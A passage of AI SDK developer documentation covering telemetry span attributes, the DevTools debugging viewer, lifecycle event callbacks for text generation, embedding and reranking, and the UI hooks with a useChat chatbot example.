- ai.operationId: "ai.generateText.doGenerate"
- ai.prompt.messages: the messages that were passed into the provider
- ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined-client. Function tools have a name, description (optional), and inputSchema (JSON schema). Provider-defined-client tools have a name, id, and input (Record).
- ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
ai.toolCall (span): a tool call that is made as part of the generateText call. See Legacy tool call spans for more details.

streamText function

streamText records 3 types of spans and 2 types of events:

ai.streamText (span): the full length of the streamText call. It contains a ai.streamText.doStream span. It contains the basic LLM span information and the following attributes:
- operation.name: ai.streamText and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamText"
- ai.prompt: the prompt that was used when calling streamText
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
- ai.settings.maxOutputTokens: the maximum number of output tokens that were set
ai.streamText.doStream (span): a provider doStream call. This span contains an ai.stream.firstChunk event and ai.toolCall spans. It contains the call LLM span information and the following attributes:
- operation.name: ai.streamText.doStream and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamText.doStream"
- ai.prompt.messages: the messages that were passed into the provider
- ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined-client. Function tools have a name, description (optional), and inputSchema (JSON schema). Provider-defined-client tools have a name, id, and input (Record).
- ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.msToFirstChunk: the time it took to receive the first chunk in milliseconds
- ai.response.msToFinish: the time it took to receive the finish part of the LLM stream in milliseconds
- ai.response.avgCompletionTokensPerSecond: the average number of completion tokens per second
- ai.response.finishReason: the reason why the generation finished
ai.toolCall (span): a tool call that is made as part of the streamText call. See Legacy tool call spans for more details.
ai.stream.firstChunk (event): an event that is emitted when the first chunk of the stream is received.
- ai.response.msToFirstChunk: the time it took to receive the first chunk
ai.stream.finish (event): an event that is emitted when the finish part of the LLM stream is received.

Deprecated object APIs

If you still run deprecated object APIs, you will see legacy span names:

generateObject: ai.generateObject, ai.generateObject.doGenerate
streamObject: ai.streamObject, ai.streamObject.doStream, ai.stream.firstChunk

Legacy object spans include the same core metadata as other LLM spans, plus object-specific attributes such as ai.schema.*, ai.response.object, and ai.settings.output.

embed function

embed records 2 types of spans:

ai.embed (span): the full length of the embed call. It contains 1 ai.embed.doEmbed spans. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embed"
- ai.value: the value that was passed into the embed function
- ai.embedding: a JSON-stringified embedding
ai.embed.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embed.doEmbed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embed.doEmbed"
- ai.values: the values that were passed into the provider (array)
- ai.embeddings: an array of JSON-stringified embeddings

embedMany function

embedMany records 2 types of spans:

ai.embedMany (span): the full length of the embedMany call. It contains 1 or more ai.embedMany.doEmbed spans. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embedMany and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embedMany"
- ai.values: the values that were passed into the embedMany function
- ai.embeddings: an array of JSON-stringified embedding
ai.embedMany.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embedMany.doEmbed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embedMany.doEmbed"
- ai.values: the values that were sent to the provider
- ai.embeddings: an array of JSON-stringified embeddings for each value

Legacy span details

Basic LLM span information

Many spans that use LLMs (ai.generateText, ai.generateText.doGenerate, ai.streamText, ai.streamText.doStream) contain the following attributes:

resource.name: the functionId that was set through telemetry.functionId
ai.model.id: the id of the model
ai.model.provider: the provider of the model
ai.request.headers.*: the request headers that were passed in through headers
ai.response.providerMetadata: provider specific metadata returned with the generation response
ai.settings.maxRetries: the maximum number of retries that were set
ai.telemetry.functionId: the functionId that was set through telemetry.functionId
ai.settings.runtimeContext.*: the runtime context that was passed in through the runtimeContext option
ai.usage.completionTokens: the number of completion tokens that were used
ai.usage.promptTokens: the number of prompt tokens that were used

Call LLM span information

Spans that correspond to individual LLM calls (ai.generateText.doGenerate, ai.streamText.doStream) contain basic LLM span information and the following attributes:

ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
ai.response.id: the id of the response. Uses the ID from the provider when available.
ai.response.timestamp: the timestamp of the response. Uses the timestamp from the provider when available.
Semantic Conventions for GenAI operations
- gen_ai.system: the provider that was used
- gen_ai.request.model: the model that was requested
- gen_ai.request.temperature: the temperature that was set
- gen_ai.request.max_tokens: the maximum number of tokens that were set
- gen_ai.request.frequency_penalty: the frequency penalty that was set
- gen_ai.request.presence_penalty: the presence penalty that was set
- gen_ai.request.top_k: the topK parameter value that was set
- gen_ai.request.top_p: the topP parameter value that was set
- gen_ai.request.stop_sequences: the stop sequences
- gen_ai.response.finish_reasons: the finish reasons that were returned by the provider
- gen_ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
- gen_ai.response.id: the id of the response. Uses the ID from the provider when available.
- gen_ai.usage.input_tokens: the number of prompt tokens that were used
- gen_ai.usage.output_tokens: the number of completion tokens that were used

Basic embedding span information

Many spans that use embedding models (ai.embed, ai.embed.doEmbed, ai.embedMany, ai.embedMany.doEmbed) contain the following attributes:

ai.model.id: the id of the model
ai.model.provider: the provider of the model
ai.request.headers.*: the request headers that were passed in through headers
ai.settings.maxRetries: the maximum number of retries that were set
ai.telemetry.functionId: the functionId that was set through telemetry.functionId
ai.settings.runtimeContext.*: the runtime context that was passed in through the runtimeContext option
ai.usage.tokens: the number of tokens that were used
resource.name: the functionId that was set through telemetry.functionId

Legacy tool call spans

Tool call spans (ai.toolCall) contain the following attributes:

operation.name: "ai.toolCall"
ai.operationId: "ai.toolCall"
ai.toolCall.name: the name of the tool
ai.toolCall.id: the id of the tool call
ai.toolCall.args: the input parameters of the tool call
ai.toolCall.result: the output result of the tool call. Only available if the tool call is successful and the result is serializable.

title: DevTools description: Debug and inspect AI SDK applications with DevTools

DevTools

DevTools is composed of two parts:

Telemetry Integration: Captures runs and steps from your AI SDK calls via the telemetry system
Viewer: A web UI to inspect the captured data

Installation

Install the DevTools package:

pnpm add @ai-sdk/devtools

Requirements

AI SDK v6 beta (ai@^6.0.0-beta.0)
Node.js compatible runtime

Using DevTools

Register the integration

import { registerTelemetryIntegration } from 'ai';
import { DevToolsTelemetry } from '@ai-sdk/devtools';

registerTelemetryIntegration(DevToolsTelemetry());

Telemetry is enabled automatically once an integration is registered — no per-call configuration is needed:

import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'What cities are in the United States?',
});

You can also pass the integration to individual calls instead of registering it globally:

import { streamText } from 'ai';
import { DevToolsTelemetry } from '@ai-sdk/devtools';

const result = streamText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  telemetry: {
    integrations: [DevToolsTelemetry()],
  },
});

Launch the viewer

Start the DevTools viewer:

npx @ai-sdk/devtools

Open http://localhost:4983 to view your AI SDK interactions.

Monorepo usage

If you are using a monorepo setup (e.g. Turborepo, Nx), start DevTools from the same workspace where your AI SDK code runs.

For example, if your API is in apps/api, run:

cd apps/api
npx @ai-sdk/devtools

Captured data

DevTools captures the following information from your AI SDK calls:

Input parameters and prompts: View the complete input sent to your LLM
Output content and tool calls: Inspect generated text and tool invocations
Token usage and timing: Monitor resource consumption and performance
Raw provider data: Access complete request and response payloads

Runs and steps

DevTools organizes captured data into runs and steps:

Run: A complete multi-step AI interaction, grouped by the initial prompt
Step: A single LLM call within a run (e.g., one generateText or streamText call)

Multi-step interactions, such as those created by tool calling or agent loops, are grouped together as a single run with multiple steps. Nested sub-agent calls are linked to their parent run, making it easy to trace the full execution tree.

How it works

The DevToolsTelemetry integration hooks into the AI SDK telemetry lifecycle to capture all generateText, streamText, generateObject, and streamObject calls. Captured data is stored locally in a JSON file (.devtools/generations.json) and served through a web UI built with Hono and React.

Security considerations

DevTools stores all AI interactions locally in plain text files, including:

User prompts and messages
LLM responses
Tool call arguments and results
API request and response data

Only use DevTools in local development environments. Do not enable DevTools in production or when handling sensitive data.

title: Event Callbacks description: Subscribe to lifecycle events in generateText, streamText, embed, embedMany, and rerank calls

Event Callbacks

The AI SDK provides per-call event callbacks that you can pass to generateText, streamText, embed, embedMany, and rerank to observe lifecycle events. This is useful for building observability tools, logging systems, analytics, and debugging utilities.

Basic Usage

Pass callbacks directly to generateText, streamText, embed, embedMany, or rerank:

import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'What is the weather in San Francisco?',
  experimental_onStart: event => {
    console.log('Generation started:', event.model.modelId);
  },
  onFinish: event => {
    console.log('Generation finished:', event.totalUsage);
  },
});

Available Callbacks

`generateText` / `streamText`

<PropertiesTable content={[ { name: 'experimental_onStart', type: '(event: OnStartEvent) => void | Promise', description: 'Called when generation begins, before any LLM calls.', }, { name: 'experimental_onStepStart', type: '(event: OnStepStartEvent) => void | Promise', description: 'Called when a step (LLM call) begins, before the provider is called.', }, { name: 'experimental_onToolExecutionStart', type: '(event: ToolExecutionStartEvent) => void | Promise', description: "Called when a tool's execute function is about to run.", }, { name: 'experimental_onToolExecutionEnd', type: '(event: ToolExecutionEndEvent) => void | Promise', description: "Called when a tool's execute function completes or errors.", }, { name: 'onStepFinish', type: '(event: OnStepFinishEvent) => void | Promise', description: 'Called when a step (LLM call) completes.', }, { name: 'onFinish', type: '(event: OnFinishEvent) => void | Promise', description: 'Called when the entire generation completes (all steps finished).', }, ]} />

`embed` / `embedMany`

<PropertiesTable content={[ { name: 'experimental_onStart', type: '(event: EmbedOnStartEvent) => void | Promise', description: 'Called when the embedding operation begins, before the embedding model is called.', }, { name: 'experimental_onFinish', type: '(event: EmbedOnFinishEvent) => void | Promise', description: 'Called when the embedding operation completes, after the embedding model returns.', }, ]} />

`rerank`

<PropertiesTable content={[ { name: 'experimental_onStart', type: '(event: RerankOnStartEvent) => void | Promise', description: 'Called when the reranking operation begins, before the reranking model is called.', }, { name: 'experimental_onFinish', type: '(event: RerankOnFinishEvent) => void | Promise', description: 'Called when the reranking operation completes, after the reranking model returns.', }, ]} />

Event Reference

`generateText` / `streamText`

`experimental_onStart`

Called when the generation operation begins, before any LLM calls are made.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  experimental_onStart: event => {
    console.log('Model:', event.model.modelId);
    console.log('Temperature:', event.temperature);
  },
});

<PropertiesTable content={[ { name: 'model', type: '{ provider: string; modelId: string }', description: 'The model being used for generation.', }, { name: 'system', type: 'string | SystemModelMessage | Array | undefined', description: 'The system message(s) provided to the model.', }, { name: 'prompt', type: 'string | Array | undefined', description: 'The prompt string or array of messages if using the prompt option.', }, { name: 'messages', type: 'Array | undefined', description: 'The messages array if using the messages option.', }, { name: 'tools', type: 'ToolSet | undefined', description: 'The tools available for this generation.', }, { name: 'toolChoice', type: 'ToolChoice | undefined', description: 'The tool choice strategy for this generation.', }, { name: 'activeTools', type: 'Array | undefined', description: 'Limits which tools are available for the model to call.', }, { name: 'maxOutputTokens', type: 'number | undefined', description: 'Maximum number of tokens to generate.', }, { name: 'temperature', type: 'number | undefined', description: 'Sampling temperature for generation.', }, { name: 'topP', type: 'number | undefined', description: 'Top-p (nucleus) sampling parameter.', }, { name: 'topK', type: 'number | undefined', description: 'Top-k sampling parameter.', }, { name: 'presencePenalty', type: 'number | undefined', description: 'Presence penalty for generation.', }, { name: 'frequencyPenalty', type: 'number | undefined', description: 'Frequency penalty for generation.', }, { name: 'stopSequences', type: 'string[] | undefined', description: 'Sequences that will stop generation.', }, { name: 'seed', type: 'number | undefined', description: 'Random seed for reproducible generation.', }, { name: 'maxRetries', type: 'number', description: 'Maximum number of retries for failed requests.', }, { name: 'timeout', type: 'TimeoutConfiguration | undefined', description: 'Timeout configuration for the generation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options.', }, { name: 'stopWhen', type: 'StopCondition | Array | undefined', description: 'Condition(s) for stopping the generation.', }, { name: 'output', type: 'Output | undefined', description: 'The output specification for structured outputs.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'include', type: '{ requestBody?: boolean; responseBody?: boolean } | undefined', description: 'Settings for controlling what data is included in step results.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'runtimeContext', type: 'CONTEXT', description: 'User-defined shared runtime context object that flows through the generation lifecycle.', }, { name: 'toolsContext', type: 'InferToolSetContext', description: 'Per-tool context map passed via toolsContext, keyed by tool name.', }, ]} />

`experimental_onStepStart`

Called before each step (LLM call) begins. Useful for tracking multi-step generations.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  experimental_onStepStart: event => {
    console.log('Step:', event.stepNumber);
    console.log('Messages:', event.messages.length);
  },
});

<PropertiesTable content={[ { name: 'stepNumber', type: 'number', description: 'Zero-based index of the current step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The model being used for this step.', }, { name: 'system', type: 'string | SystemModelMessage | Array | undefined', description: 'The system message for this step.', }, { name: 'messages', type: 'Array', description: 'The messages that will be sent to the model for this step.', }, { name: 'tools', type: 'ToolSet | undefined', description: 'The tools available for this generation.', }, { name: 'toolChoice', type: 'LanguageModelV4ToolChoice | undefined', description: 'The tool choice configuration for this step.', }, { name: 'activeTools', type: 'Array | undefined', description: 'Limits which tools are available for this step.', }, { name: 'steps', type: 'ReadonlyArray', description: 'Array of results from previous steps (empty for first step).', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options for this step.', }, { name: 'timeout', type: 'TimeoutConfiguration | undefined', description: 'Timeout configuration for the generation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'stopWhen', type: 'StopCondition | Array | undefined', description: 'Condition(s) for stopping the generation.', }, { name: 'output', type: 'Output | undefined', description: 'The output specification for structured outputs.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'include', type: '{ requestBody?: boolean; responseBody?: boolean } | undefined', description: 'Settings for controlling what data is included in step results.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'runtimeContext', type: 'CONTEXT', description: 'User-defined shared runtime context object. May be updated from prepareStep between steps.', }, { name: 'toolsContext', type: 'InferToolSetContext', description: 'Per-tool context map. May be updated from prepareStep between steps.', }, ]} />

`experimental_onToolExecutionStart`

Called before a tool's execute function runs.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'What is the weather?',
  tools: { getWeather },
  experimental_onToolExecutionStart: event => {
    console.log('Tool:', event.toolCall.toolName);
    console.log('Input:', event.toolCall.input);
  },
});

`experimental_onToolExecutionEnd`

Called after a tool's execute function completes or errors. Uses a discriminated union on the success field.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'What is the weather?',
  tools: { getWeather },
  experimental_onToolExecutionEnd: event => {
    console.log('Tool:', event.toolCall.toolName);
    console.log('Duration:', event.durationMs, 'ms');

    if (event.success) {
      console.log('Output:', event.output);
    } else {
      console.error('Error:', event.error);
    }
  },
});

`onStepFinish`

Called after each step (LLM call) completes. Provides the full StepResult.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  onStepFinish: event => {
    console.log('Step:', event.stepNumber);
    console.log('Finish reason:', event.finishReason);
    console.log('Tokens:', event.usage.totalTokens);
  },
});

<PropertiesTable content={[ { name: 'stepNumber', type: 'number', description: 'Zero-based index of this step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'Information about the model that produced this step.', }, { name: 'finishReason', type: "'stop' | 'length' | 'content-filter' | 'tool-calls' | 'error' | 'other'", description: 'The unified reason why the generation finished.', }, { name: 'usage', type: 'LanguageModelUsage', description: 'The token usage of the generated text.', properties: [ { type: 'LanguageModelUsage', parameters: [ { name: 'inputTokens', type: 'number | undefined', description: 'The total number of input (prompt) tokens used.', }, { name: 'outputTokens', type: 'number | undefined', description: 'The number of output (completion) tokens used.', }, { name: 'totalTokens', type: 'number | undefined', description: 'The total number of tokens used.', }, ], }, ], }, { name: 'text', type: 'string', description: 'The generated text.', }, { name: 'toolCalls', type: 'Array', description: 'The tool calls that were made during the generation.', }, { name: 'toolResults', type: 'Array', description: 'The results of the tool calls.', }, { name: 'content', type: 'Array', description: 'The content that was generated in this step.', }, { name: 'reasoning', type: 'Array<ReasoningPart | ReasoningFilePart>', description: 'The reasoning that was generated during the generation.', }, { name: 'reasoningText', type: 'string | undefined', description: 'The reasoning text that was generated.', }, { name: 'files', type: 'Array', description: 'The files that were generated during the generation.', }, { name: 'sources', type: 'Array', description: 'The sources that were used to generate the text.', }, { name: 'warnings', type: 'CallWarning[] | undefined', description: 'Warnings from the model provider.', }, { name: 'request', type: 'LanguageModelRequestMetadata', description: 'Additional request information.', }, { name: 'response', type: 'LanguageModelResponseMetadata', description: 'Additional response information including id, modelId, timestamp, headers, and messages.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'runtimeContext', type: 'CONTEXT', description: 'User-defined shared runtime context object flowing through the generation.', }, { name: 'toolsContext', type: 'InferToolSetContext', description: 'Per-tool context map for the generation step.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Additional provider-specific metadata.', }, ]} />

`onFinish`

Called when the entire generation completes (all steps finished). Includes aggregated data.

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  onFinish: event => {
    console.log('Total steps:', event.steps.length);
    console.log('Total tokens:', event.totalUsage.totalTokens);
    console.log('Final text:', event.text);
  },
});

<PropertiesTable content={[ { name: 'steps', type: 'Array', description: 'Array containing results from all steps in the generation.', }, { name: 'totalUsage', type: 'LanguageModelUsage', description: 'Aggregated token usage across all steps.', properties: [ { type: 'LanguageModelUsage', parameters: [ { name: 'inputTokens', type: 'number | undefined', description: 'The total number of input tokens used across all steps.', }, { name: 'outputTokens', type: 'number | undefined', description: 'The total number of output tokens used across all steps.', }, { name: 'totalTokens', type: 'number | undefined', description: 'The total number of tokens used across all steps.', }, ], }, ], }, { name: 'stepNumber', type: 'number', description: 'Zero-based index of the final step.', }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'Information about the model that produced the final step.', }, { name: 'finishReason', type: "'stop' | 'length' | 'content-filter' | 'tool-calls' | 'error' | 'other'", description: 'The unified reason why the generation finished.', }, { name: 'usage', type: 'LanguageModelUsage', description: 'The token usage from the final step only (not aggregated).', }, { name: 'text', type: 'string', description: 'The full text that has been generated.', }, { name: 'toolCalls', type: 'Array', description: 'The tool calls that were made in the final step.', }, { name: 'toolResults', type: 'Array', description: 'The results of the tool calls from the final step.', }, { name: 'content', type: 'Array', description: 'The content that was generated in the final step.', }, { name: 'reasoning', type: 'Array<ReasoningPart | ReasoningFilePart>', description: 'The reasoning that was generated.', }, { name: 'reasoningText', type: 'string | undefined', description: 'The reasoning text that was generated.', }, { name: 'files', type: 'Array', description: 'Files that were generated in the final step.', }, { name: 'sources', type: 'Array', description: 'Sources that have been used as input to generate the response.', }, { name: 'warnings', type: 'CallWarning[] | undefined', description: 'Warnings from the model provider.', }, { name: 'request', type: 'LanguageModelRequestMetadata', description: 'Additional request information from the final step.', }, { name: 'response', type: 'LanguageModelResponseMetadata', description: 'Additional response information from the final step.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, { name: 'runtimeContext', type: 'CONTEXT', description: 'The final state of the user-defined shared runtime context object.', }, { name: 'toolsContext', type: 'InferToolSetContext', description: 'The final state of the per-tool context map passed via toolsContext.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Additional provider-specific metadata from the final step.', }, ]} />

`embed` / `embedMany`

`experimental_onStart`

Called when the embedding operation begins, before the embedding model is called. Both embed and embedMany share the same event interface; the operationId field distinguishes them ('ai.embed' vs 'ai.embedMany'), and the value field is a single string for embed or an array of strings for embedMany.

import { embed } from 'ai';

const result = await embed({
  model: openai.embedding('text-embedding-3-small'),
  value: 'sunny day at the beach',
  experimental_onStart: event => {
    console.log('Operation:', event.operationId);
    console.log('Model:', event.model.modelId);
  },
});

<PropertiesTable content={[ { name: 'callId', type: 'string', description: 'Unique identifier for this embed call.', }, { name: 'operationId', type: 'string', description: "Identifies the operation type ('ai.embed' or 'ai.embedMany').", }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The embedding model being used.', }, { name: 'value', type: 'string | Array', description: 'The value(s) being embedded. A single string for embed, or an array for embedMany.', }, { name: 'maxRetries', type: 'number', description: 'Maximum number of retries for failed requests.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, ]} />

`experimental_onFinish`

Called when the embedding operation completes. For embed, embedding is a single vector and response is a single response object. For embedMany, embedding is an array of vectors and response is an array of response objects (one per chunk).

import { embedMany } from 'ai';

const result = await embedMany({
  model: openai.embedding('text-embedding-3-small'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
  experimental_onFinish: event => {
    console.log('Operation:', event.operationId);
    console.log('Usage:', event.usage);
  },
});

<PropertiesTable content={[ { name: 'callId', type: 'string', description: 'Unique identifier for this embed call.', }, { name: 'operationId', type: 'string', description: "Identifies the operation type ('ai.embed' or 'ai.embedMany').", }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The embedding model that was used.', }, { name: 'value', type: 'string | Array', description: 'The value(s) that were embedded.', }, { name: 'embedding', type: 'Embedding | Array', description: 'The resulting embedding(s). A single vector for embed, or an array for embedMany.', }, { name: 'usage', type: 'EmbeddingModelUsage', description: 'Token usage for the embedding operation.', }, { name: 'warnings', type: 'Array', description: 'Warnings from the embedding model.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Optional provider-specific metadata.', }, { name: 'response', type: '{ headers?: Record<string, string>; body?: unknown } | Array<{ headers?: Record<string, string>; body?: unknown } | undefined> | undefined', description: 'Response data. A single response for embed, or an array for embedMany (one per chunk).', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, ]} />

`rerank`

`experimental_onStart`

Called when the reranking operation begins, before the reranking model is called.

import { rerank } from 'ai';

const result = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  experimental_onStart: event => {
    console.log('Operation:', event.operationId);
    console.log('Model:', event.model.modelId);
  },
});

<PropertiesTable content={[ { name: 'callId', type: 'string', description: 'Unique identifier for this rerank call.', }, { name: 'operationId', type: 'string', description: "Identifies the operation type ('ai.rerank').", }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The reranking model being used.', }, { name: 'documents', type: 'Array<JSONObject | string>', description: 'The documents being reranked.', }, { name: 'query', type: 'string', description: 'The query to rerank the documents against.', }, { name: 'topN', type: 'number | undefined', description: 'Number of top documents to return.', }, { name: 'maxRetries', type: 'number', description: 'Maximum number of retries for failed requests.', }, { name: 'abortSignal', type: 'AbortSignal | undefined', description: 'Abort signal for cancelling the operation.', }, { name: 'headers', type: 'Record<string, string | undefined> | undefined', description: 'Additional HTTP headers sent with the request.', }, { name: 'providerOptions', type: 'ProviderOptions | undefined', description: 'Additional provider-specific options.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, ]} />

`experimental_onFinish`

Called when the reranking operation completes, after the reranking model returns.

import { rerank } from 'ai';

const result = await rerank({
  model: cohere.reranking('rerank-v3.5'),
  documents: ['sunny day at the beach', 'rainy afternoon in the city'],
  query: 'talk about rain',
  experimental_onFinish: event => {
    console.log('Operation:', event.operationId);
    console.log('Rankings:', event.ranking.length);
  },
});

<PropertiesTable content={[ { name: 'callId', type: 'string', description: 'Unique identifier for this rerank call.', }, { name: 'operationId', type: 'string', description: "Identifies the operation type ('ai.rerank').", }, { name: 'model', type: '{ provider: string; modelId: string }', description: 'The reranking model that was used.', }, { name: 'documents', type: 'Array<JSONObject | string>', description: 'The documents that were reranked.', }, { name: 'query', type: 'string', description: 'The query that documents were reranked against.', }, { name: 'ranking', type: 'Array<{ originalIndex: number; score: number; document: JSONObject | string }>', description: 'The reranked results sorted by relevance score in descending order.', }, { name: 'warnings', type: 'Array', description: 'Warnings from the reranking model.', }, { name: 'providerMetadata', type: 'ProviderMetadata | undefined', description: 'Optional provider-specific metadata.', }, { name: 'response', type: '{ id?: string; timestamp: Date; modelId: string; headers?: Record<string, string>; body?: unknown }', description: 'Response data including headers and body.', }, { name: 'functionId', type: 'string | undefined', description: 'Identifier from telemetry settings for grouping related operations.', }, ]} />

Use Cases

Logging and Debugging

import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  experimental_onStart: event => {
    console.log(`[${new Date().toISOString()}] Generation started`, {
      model: event.model.modelId,
      provider: event.model.provider,
    });
  },
  onStepFinish: event => {
    console.log(
      `[${new Date().toISOString()}] Step ${event.stepNumber} finished`,
      {
        finishReason: event.finishReason,
        tokens: event.usage.totalTokens,
      },
    );
  },
  onFinish: event => {
    console.log(`[${new Date().toISOString()}] Generation complete`, {
      totalSteps: event.steps.length,
      totalTokens: event.totalUsage.totalTokens,
    });
  },
});

Tool Execution Monitoring

import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'What is the weather?',
  tools: { getWeather },
  experimental_onToolExecutionStart: event => {
    console.log(`Tool "${event.toolCall.toolName}" starting...`);
  },
  experimental_onToolExecutionEnd: event => {
    if (event.success) {
      console.log(
        `Tool "${event.toolCall.toolName}" completed in ${event.durationMs}ms`,
      );
    } else {
      console.error(`Tool "${event.toolCall.toolName}" failed:`, event.error);
    }
  },
});

Embedding Observability

import { embedMany } from 'ai';

const result = await embedMany({
  model: openai.embedding('text-embedding-3-small'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
  experimental_onStart: event => {
    console.log(`Embedding started (${event.operationId})`, {
      model: event.model.modelId,
      valueCount: Array.isArray(event.value) ? event.value.length : 1,
    });
  },
  experimental_onFinish: event => {
    console.log(`Embedding complete (${event.operationId})`, {
      tokens: event.usage.tokens,
    });
  },
});

Error Handling

Errors thrown inside callbacks are caught and do not break the generation, embedding, or reranking flow. This ensures that monitoring code cannot disrupt your application:

const result = await generateText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  experimental_onStart: () => {
    throw new Error('This error is caught internally');
    // Generation continues normally
  },
});

title: Overview description: An overview of AI SDK UI.

AI SDK UI

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently. With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.

useChat offers real-time streaming of chat messages, abstracting state management for inputs, messages, loading, and errors, allowing for seamless integration into any UI design.
useCompletion enables you to handle text completions in your applications, managing the prompt input and automatically updating the UI as new completions are streamed.
useObject is a hook that allows you to consume streamed JSON objects, providing a simple way to handle and display structured data in your application.

These hooks are designed to reduce the complexity and time required to implement AI interactions, letting you focus on creating exceptional user experiences.

UI Framework Support

AI SDK UI supports the following frameworks: React, Svelte, Vue.js, Angular, and SolidJS.

Here is a comparison of the supported functions across these frameworks:

	useChat	useCompletion	useObject
React `@ai-sdk/react`
Vue.js `@ai-sdk/vue`
Svelte `@ai-sdk/svelte`	Chat	Completion	StructuredObject
Angular `@ai-sdk/angular`	Chat	Completion	StructuredObject
SolidJS (community)

Framework Examples

Explore these example implementations for different frameworks:

API Reference

Please check out the AI SDK UI API Reference for more details on each function.

title: Chatbot description: Learn how to use the useChat hook.

Chatbot

To summarize, the useChat hook provides the following features:

Message Streaming: All the messages from the AI provider are streamed to the chat UI in real-time.
Managed States: The hook manages the states for input, messages, status, error and more for you.
Seamless Integration: Easily integrate your chat AI into any design or layout with minimal effort.

Example

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Page() {
  const { messages, sendMessage, status } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });
  const [input, setInput] = useState('');

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.parts.map((part, index) =>
            part.type === 'text' ? <span key={index}>{part.text}</span> : null,
          )}
        </div>
      ))}

      <form
        onSubmit={e => {
          e.preventDefault();
          if (input.trim()) {
            sendMessage({ text: input });
            setInput('');
          }
        }}
      >
        <input
          value={input}
          onChange={e => setInput(e.target.value)}
          disabled={status !== 'ready'}
          placeholder="Say something..."
        />
        <button type="submit" disabled={status !== 'ready'}>
          Submit
        </button>
      </form>
    </>
  );
}

